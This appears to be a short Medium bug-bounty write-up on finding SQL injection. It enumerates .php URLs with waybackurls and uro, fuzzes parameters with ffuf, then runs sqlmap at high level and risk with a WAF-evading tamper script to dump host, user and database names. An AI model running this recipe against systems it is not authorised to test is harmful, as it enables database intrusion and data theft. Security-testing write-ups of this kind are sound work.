How I Found multiple SQL Injection with FFUF and Sqlmap in a few minutes

Enumeration Phase:

waybackurls | uro | grep “.php” > php-files.txt

uro is a tool used to delete duplicate urls

Getting Parameters:

ffuf -w lowercase-parameters.txt -u ""
ffuf -w lowercase-parameters.txt -X POST -d "FUZZ=5" -u ""


sqlmap -r req3.txt -p commitment --force-ssl --level 5 --risk 3 --dbms=”MYSQL” --hostname --current-user --current-db --dbs --tamper=between --no-cast
--level 5 --> Level of tests to perform.
--risk 3 --> Risk of tests to perform
--dbms --> back-end DBMS value
--no-cast --> to avoid use cast-alike statements during data fetching
--tamper --> to evade filters and WAF’s
"--hostname --current-user --current-db --dbs" --> to retrieve info about the database
#1st SQLI
#2nd SQLI
#3rd SQLI
#4th SQLI



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store